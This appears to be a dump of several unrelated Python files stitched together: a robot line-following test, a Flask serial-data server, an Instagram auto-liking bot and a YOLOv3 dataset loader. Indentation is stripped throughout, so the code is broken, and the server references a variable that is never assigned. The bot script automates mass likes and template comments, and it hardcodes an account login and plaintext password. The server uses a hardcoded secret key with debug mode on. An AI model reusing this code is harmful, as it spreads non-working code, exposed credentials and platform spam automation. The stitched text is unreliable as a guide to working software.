cs.client_socket.client.close()
sim.terminate()
def test_follow_line(self):
test_args = ["program", "-t", "config_small"]
with patch.object(sys, 'argv', test_args):
sim = Process(target=__main__.main, daemon=True)
sim.start()
cs.client_socket = None
sleep(9)
from ev3dev2.sensor.lego import ColorSensor
tank = MoveTank(OUTPUT_A, OUTPUT_D)
tank.cs = ColorSensor(INPUT_2)
try:
                # Follow the line for 14500 ms
tank.follow_line(
kp=11.3/4, ki=0.05/4, kd=3./4,
speed=SpeedPercent(10),
follow_for=follow_for_ms,
ms=14500,
target_light_intensity=50
)
except Exception:
tank.stop()
raise
if __name__ == '__main__':
unittest.main()
|
server.py
|
# server.py
from gevent import monkey
monkey.patch_all()  # patch the standard library before importing anything else
from random import *
import time
from threading import Thread
from flask import Flask, render_template, session, request
from flask_socketio import SocketIO, emit, join_room, disconnect
import serial
import random
from datetime import datetime
app = Flask(__name__)
app.debug = True
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)
thread = None
#ser = serial.Serial('/dev/tty.usbserial-141',9600)
# ser = serial.Serial(
#
# port='/dev/tty.usbserial-1412',
# baudrate = 9600,
# # parity=serial.PARITY_NONE,
# # stopbits=serial.STOPBITS_ONE,
# # bytesize=serial.EIGHTBITS,
# # timeout=1
# )
#data1 = ser.readline();
def loop_forever():
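    # NOTE: read_byte is only assigned by the commented-out ser.read(2) calls,
    # so this function raises NameError until the serial setup above is restored.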
#read_byte = ser.read(2)
socketio.emit('message', {'data': 'This is data', 'time': read_byte.decode('ascii')}, namespace='/test')
socketio.emit('message2', {'data2': 'This is data', 'time': read_byte.decode('ascii')}, namespace='/test')
while read_byte is not None:
#read_byte = ser.read(2)
socketio.emit('message', {'data': 'This is data', 'time': read_byte.decode('ascii')}, namespace='/test')
socketio.emit('message2', {'data2': 'This is data', 'time': read_byte.decode('ascii')}, namespace='/test')
        print(read_byte.decode("ascii"))
def background_stuff():
""" python code in main.py """
print('In background_stuff')
random.seed(datetime.now())
ser = serial.Serial(port='/dev/tty.usbserial-1413',baudrate = 9600)
    myList = [0] * 25  # holds the most recent batch of 25 serial readings
while True:
for z in range(0, 25):
data1 = ser.readline();
myList[z] = data1;
time.sleep(0.25);
y = str(randint(-10,10));
socketio.emit('message', {'data': 'This is data', 'time': myList}, namespace='/test')
# socketio.emit('message2', {'data2': 'This is data', 'time': x}, namespace='/test')
@app.route('/lib/<path:path>')
def send_js(path):
return app.send_static_file('lib/'+path)
@app.route('/styles/<path:path>')
def send_styles(path):
return app.send_static_file('styles/'+path)
@app.route('/')
def index():
global thread
if thread is None:
thread = Thread(target=background_stuff)
thread.start()
return app.send_static_file('index.html')
mqttThread = Thread(target=loop_forever)
mqttThread.start()
socketio.run(app)  # use the SocketIO runner so the WebSocket transport works
# from flask import Flask, request
# # set the project root directory as the static folder, you can set others.
# app = Flask(__name__)
#
# @app.route('/')
# def root():
# return app.send_static_file('index.html')
# app.run()
#ser = serial.Serial(port='/dev/tty.usbserial-1412',baudrate = 9600)
#data1 = ser.readline();
#value = int(data1);
#counter = counter + 1;
# while (counter < 25):
# myList[counter] = data1;
# counter= counter+1;
#time.sleep(0.5)
#print("sleeping")
#t = str(randint(40,90))
#t = myList[counter];
#if counter == 6: counter = 0;
#for z in range(0, 24):
#data1 = ser.readline();
#x = str(randint(60,70));
#myList[z] = data1;
#socketio.emit('message', {'data': 'This is data', 'time': data1}, namespace='/test')
# for z in range(0, 4):
# data1 = ser.readline();
# socketio.emit('message', {'data2': 'This is data', 'time': data1}, namespace='/test')
|
fntxworld.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import time
from src import InstaBot
from src.check_status import check_status
from src.feed_scanner import feed_scanner
from src.follow_protocol import follow_protocol
from src.unfollow_protocol import unfollow_protocol
from multiprocessing import Process
from multiprocessing import Pool
def the_bot(id, passw):
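    # Configure an InstaBot session for the given credentials and run it forever
    # in the mode selected below (mode 0 = bot.new_auto_mod()).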
bot = InstaBot(
login=id,
password=passw,
like_per_day=5000,
comments_per_day=0,
        tag_list=['muaythai', 'Kickboxing', 'mma', 'fightnight', 'boxing', 'ufc', 'bellator', 'wwe', 'conormcgregor', 'thenotorious', 'fighting', 'hiphop', 'concert', 'musiclover', 'asaprocky', 'awge', 'rock', 'itslit', 'supreme', 'offwhite', 'grailed', 'fightclub', 'edmfamily'],
tag_blacklist=['rain', 'thunderstorm'],
user_blacklist={},
max_like_for_one_tag=3000,
follow_per_day=0,
follow_time=1 * 5,
unfollow_per_day=0,
unfollow_break_min=15,
unfollow_break_max=30,
log_mod=0,
proxy='',
# List of list of words, each of which will be used to generate comment
# For example: "This shot feels wow!"
comment_list=[["this", "the", "your"],
["photo", "picture", "pic", "shot", "snapshot"],
["is", "looks", "feels", "is really"],
["great", "super", "good", "very good", "good", "wow",
"WOW", "cool", "GREAT","magnificent", "magical",
"very cool", "stylish", "beautiful", "so beautiful",
"so stylish", "so professional", "lovely",
"so lovely", "very lovely", "glorious","so glorious",
"very glorious", "adorable", "excellent", "amazing"],
[".", "..", "...", "!", "!!", "!!!"]],
# Use unwanted_username_list to block usernames containing a string
## Will do partial matches; i.e. 'mozart' will block 'legend_mozart'
### 'free_followers' will be blocked because it contains 'free'
unwanted_username_list=[
'second', 'stuff', 'art', 'project', 'love', 'life', 'food', 'blog',
'free', 'keren', 'photo', 'graphy', 'indo', 'travel', 'art', 'shop',
'store', 'sex', 'toko', 'jual', 'online', 'murah', 'jam', 'kaos',
'case', 'baju', 'fashion', 'corp', 'tas', 'butik', 'grosir', 'karpet',
'sosis', 'salon', 'skin', 'care', 'cloth', 'tech', 'rental', 'kamera',
'beauty', 'express', 'kredit', 'collection', 'impor', 'preloved',
'follow', 'follower', 'gain', '.id', '_id', 'bags'
],
unfollow_whitelist=['example_user_1', 'example_user_2'])
while True:
#print("# MODE 0 = ORIGINAL MODE BY LEVPASHA")
#print("## MODE 1 = MODIFIED MODE BY KEMONG")
#print("### MODE 2 = ORIGINAL MODE + UNFOLLOW WHO DON'T FOLLOW BACK")
#print("#### MODE 3 = MODIFIED MODE : UNFOLLOW USERS WHO DON'T FOLLOW YOU BASED ON RECENT FEED")
#print("##### MODE 4 = MODIFIED MODE : FOLLOW USERS BASED ON RECENT FEED ONLY")
#print("###### MODE 5 = MODIFIED MODE : JUST UNFOLLOW EVERYBODY, EITHER YOUR FOLLOWER OR NOT")
################################
## WARNING ###
################################
# DON'T USE MODE 5 FOR A LONG PERIOD. YOU RISK YOUR ACCOUNT FROM GETTING BANNED
## USE MODE 5 IN BURST MODE, USE IT TO UNFOLLOW PEOPLE AS MANY AS YOU WANT IN SHORT TIME PERIOD
mode = 0
#print("You choose mode : %i" %(mode))
#print("CTRL + C to cancel this operation or wait 30 seconds to start")
#time.sleep(30)
if mode == 0:
bot.new_auto_mod()
elif mode == 1:
check_status(bot)
while bot.self_following - bot.self_follower > 200:
unfollow_protocol(bot)
time.sleep(10 * 60)
check_status(bot)
while bot.self_following - bot.self_follower < 400:
while len(bot.user_info_list) < 50:
feed_scanner(bot)
time.sleep(5 * 60)
follow_protocol(bot)
time.sleep(10 * 60)
check_status(bot)
elif mode == 2:
bot.bot_mode = 1
bot.new_auto_mod()
elif mode == 3:
unfollow_protocol(bot)
time.sleep(10 * 60)
elif mode == 4:
feed_scanner(bot)
time.sleep(60)
follow_protocol(bot)
time.sleep(10 * 60)
elif mode == 5:
bot.bot_mode = 2
unfollow_protocol(bot)
else:
print("Wrong mode!")
p = Pool()
p.starmap(the_bot, [("fntxworld", "coyote311")])
#p = Process(target=the_bot, args=["fntxworld", "coyote311"])
#p.start()
#p.join()
#pool.apply_async(the_bot)
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif']
vid_formats = ['.mov', '.avi', '.mp4']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
class LoadImages: # for inference
def __init__(self, path, img_size=416, half=False):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
self.half = half # half precision fp16 images
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in ' + path
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Normalize RGB
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416, half=False):
self.img_size = img_size
self.half = half # half precision fp16 images
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Normalize RGB
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=416, half=False):
self.mode = 'images'
self.img_size = img_size
self.half = half # half precision fp16 images
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, interp=cv2.INTER_LINEAR)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Normalize RGB
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
    def __init__(self, path, img_size=416, batch_size=16, augment=False, hyp=None, rect=True, stride=32.0, image_weights=False,
cache_labels=False, cache_images=False):
path = str(Path(path)) # os-agnostic
with open(path, 'r') as f:
self.img_files = [x.replace('/', os.sep) for x in f.read().splitlines() # os-agnostic
if os.path.splitext(x)[-1].lower() in img_formats]
n = len(self.img_files)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
assert n > 0, 'No images found in %s' % path
self.n = n
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Read image shapes
sp = 'data' + os.sep + path.replace('.txt', '.shapes').split(os.sep)[-1] # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
# Sort by aspect ratio
s = np.array(s, dtype=np.float64)
ar = s[:, 1] / s[:, 0] # aspect ratio
i = ar.argsort()
self.img_files = [self.img_files[i] for i in i]
self.label_files = [self.label_files[i] for i in i]
self.shapes = s[i]
ar = ar[i]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride).astype(np.int) * stride
# Preload labels (required for weighted CE training)
self.imgs = [None] * n
self.labels = [None] * n
if cache_labels or image_weights: # cache labels for faster training
self.labels = [np.zeros((0, 5))] * n
extract_bounding_boxes = False
create_datasubset = False
pbar = tqdm(self.label_files, desc='Reading labels')
nm, nf, ne, ns = 0, 0, 0, 0 # number missing, number found, number empty, number datasubset
for i, file in enumerate(pbar):
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w, _ = img.shape
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * np.array([w, h, w, h]) # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # file empty
pbar.desc = 'Reading labels (%g found, %g missing, %g empty for %g images)' % (nf, nm, ne, n)
assert nf > 0, 'No labels found. Recommend correcting image and label paths.'
# Cache images into memory for faster training (~5GB)
if cache_images and augment: # if training
for i in tqdm(range(min(len(self.img_files), 10000)), desc='Reading images'): # max 10k images
img_path = self.img_files[i]
img = cv2.imread(img_path) # BGR
assert img is not None, 'Image Not Found ' + img_path
r = self.img_size / max(img.shape) # size ratio
if self.augment and r < 1: # if training (NOT testing), downsize to inference shape
h, w, _ = img.shape
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_LINEAR) # or INTER_AREA
self.imgs[i] = img
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
img_path = self.img_files[index]
label_path = self.label_files[index]
mosaic = True and self.augment # load 4 images at a time into a mosaic (only during training)
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
h, w, _ = img.shape
else:
# Load image
img = load_image(self, index)
# Letterbox
h, w, _ = img.shape
if self.rect:
img, ratio, padw, padh = letterbox(img, self.batch_shapes[self.batch[index]], mode='rect')
else:
img, ratio, padw, padh = letterbox(img, self.img_size, mode='square')
# Load labels
labels = []
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, 'r') as f:
x = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + padh
if self.augment:
# Augment imagespace
g = 0.0 if mosaic else 1.0 # do not augment mosaics
hyp = self.hyp
img, labels = random_affine(img, labels,
degrees=hyp['degrees'] * g,
translate=hyp['translate'] * g,
scale=hyp['scale'] * g,
shear=hyp['shear'] * g)
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Normalize
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img, dtype=np.float32) # uint8 to float32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return torch.from_numpy(img), labels_out, img_path, (h, w)
@staticmethod
def collate_fn(batch):
img, label, path, hw = list(zip(*batch)) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, hw
class LoadImagesAndLabelsv2(Dataset): # for training/testing
    def __init__(self, path, img_size=416, batch_size=16, augment=False, hyp=None, rect=True, stride=32.0, image_weights=False,
cache_labels=False, cache_images=False):
path = str(Path(path)) # os-agnostic
with open(path, 'r') as f:
self.img_files = [x.replace('/', os.sep) for x in f.read().splitlines() # os-agnostic
if os.path.splitext(x)[-1].lower() in img_formats]
n = len(self.img_files)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
assert n > 0, 'No images found in %s' % path
self.n = n
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Read image shapes
sp = 'data' + os.sep + path.replace('.txt', '.shapes').split(os.sep)[-1] # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
# Sort by aspect ratio
s = np.array(s, dtype=np.float64)
ar = s[:, 1] / s[:, 0] # aspect ratio
i = ar.argsort()
self.img_files = [self.img_files[i] for i in i]
self.label_files = [self.label_files[i] for i in i]
self.shapes = s[i]
ar = ar[i]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride).astype(np.int) * stride
# Preload labels (required for weighted CE training)
self.imgs = [None] * n
self.labels = [None] * n
if cache_labels or image_weights: # cache labels for faster training
self.labels = [np.zeros((0, 5))] * n
extract_bounding_boxes = False
create_datasubset = False
pbar = tqdm(self.label_files, desc='Reading labels')
nm, nf, ne, ns = 0, 0, 0, 0 # number missing, number found, number empty, number datasubset
for i, file in enumerate(pbar):
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w, _ = img.shape
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * np.array([w, h, w, h]) # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # file empty
pbar.desc = 'Reading labels (%g found, %g missing, %g empty for %g images)' % (nf, nm, ne, n)
assert nf > 0, 'No labels found. Recommend correcting image and label paths.'
# Cache images into memory for faster training (~5GB)
if cache_images and augment: # if training
for i in tqdm(range(min(len(self.img_files), 10000)), desc='Reading images'): # max 10k images
img_path = self.img_files[i]
img = cv2.imread(img_path) # BGR
assert img is not None, 'Image Not Found ' + img_path
r = self.img_size / max(img.shape) # size ratio
if self.augment and r < 1: # if training (NOT testing), downsize to inference shape
h, w, _ = img.shape
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_LINEAR) # or INTER_AREA
self.imgs[i] = img
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
img_path = self.img_files[index]
label_path = self.label_files[index]
mosaic = True and self.augment # load 4 images at a time into a mosaic (only during training)
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
h, w, _ = img.shape
else:
# Load image
img, (h0, w0), (h, w) = load_imagev2(self, index)
# Letterbox
if self.rect:
img, ratio, padw, padh = letterbox(img, self.batch_shapes[self.batch[index]], mode='rect')
else:
img, ratio, padw, padh = letterbox(img, self.img_size, mode='square')
pad=(padw, padh)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, 'r') as f:
x = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + padh
if self.augment:
# Augment imagespace
g = 0.0 if mosaic else 1.0 # do not augment mosaics
hyp = self.hyp
img, labels = random_affine(img, labels,
degrees=hyp['degrees'] * g,
translate=hyp['translate'] * g,
scale=hyp['scale'] * g,
shear=hyp['shear'] * g)
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Normalize
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img, dtype=np.float32) # uint8 to float32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return torch.from_numpy(img), labels_out, img_path, shapes
@staticmethod
def collate_fn(batch):
img, label, path, hw = list(zip(*batch)) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, hw
def load_image(self, index):
# loads 1 image from dataset
img = self.imgs[index]
if img is None:
img_path = self.img_files[index]
img = cv2.imread(img_path) # BGR
